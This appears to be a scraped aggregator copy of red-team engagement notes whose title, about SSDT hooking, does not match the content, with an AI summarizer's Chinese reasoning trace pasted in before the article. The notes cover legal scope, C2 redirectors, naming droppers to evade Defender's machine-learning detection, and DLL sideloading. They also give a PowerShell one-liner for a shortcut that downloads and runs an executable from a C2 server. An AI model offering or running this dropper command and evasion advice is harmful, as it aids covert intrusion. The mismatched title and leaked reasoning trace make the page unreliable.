Hells Hollow: A new SSDT Hooking technique
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内。用户的要求是直接写文章描述,不需要特定的开头。首先,我得仔细阅读用户提供的文章内容。 文章主要讨论了红队行动中的注意事项和技巧。包括法律授权、团队沟通、C2基础设施、投递器的命名和使用,以及PowerShell脚本的应用。这些都是红队在执行任务时需要考虑的关键点。 接下来,我需要将这些要点浓缩成一句话,确保涵盖所有主要内容。要注意用词简洁,避免冗长。比如,“法律授权”可以简化为“法律授权”,“C2基础设施”可以保留原样,“投递器的命名和使用”可以合并为“投递器的命名与使用”。 最后,组合这些关键词,形成一个连贯的句子,确保不超过100字。可能的结构是:“文章探讨了红队行动中的法律授权、团队沟通、C2基础设施、投递器的命名与使用及PowerShell脚本应用等关键点。” 检查一下字数是否符合要求,并确保没有遗漏重要信息。这样用户就能快速了解文章的核心内容了。 </think> 文章探讨了红队行动中的法律授权、团队沟通、C2基础设施、投递器的命名与使用及PowerShell脚本应用等关键点。 2025-10-12 10:46:56 Author: fluxsec.red(查看原文) 阅读量:131 收藏

Some tricks and notes around Red Team engagements


  • Before an engagement do you have:
    • Full legal sign off for what you are about to do?
    • A clearly defined legal scope of what networks / ranges / machines you are allowed to target and test?
    • Does the entire team know the scope boundaries and has it been briefed in full?
    • Never break the law. Always ask clients permission (or have it explicitly in scope) before running an exploit. If the exploit could cause a device to go down, in that circumstance, always seek explicit permission from the authorising entity.
  • For Cobalt Strike ops, see cheat sheet here I forked from An0nUD4Y on GH. Some good stuff in there both for Cobalt Strike and also general post exploitation. I may edit that, and / or pull some things into here where I find them useful in red team offensive development / infrastructure creation / hardening .

C2 infrastructure

I have some notes on redirectors on my forked cheat sheet, but mostly:

  • Use redirectors.
  • Use expired domains to look for newly expired domains, check them in proxy tools / AlienVault for any existing reputation etc.
  • Invest some time in maturing infrastructure if required.

Droppers

Do not name them chrome.exe, ms-updater.exe - certainly if they are unsigned, Defender’s ML will pick these up as machine learning trojan signatures - and rightly so. Choose something more unique or bespoke.

If it can be avoided; do NOT use an executable, always go for a DLL and preferably choose DLL sideloading.

Code signing certificates can go a long way; I would not recommend using leaked ones, this could be seen as theft, though I do not know any specific case law around it. It’s not worth it imo.

Powershell one-liner which can be stuck into a shortcut to download from a C2 into % ProgramData%: powershell.exe -w h -c "iwr http://172.17.57.89:8080/thanks -o $env:ProgramData\test.exe; start $env:ProgramData\test.exe"


文章来源: https://fluxsec.red/red-team-notes
如有侵权请联系:admin#unsafe.sh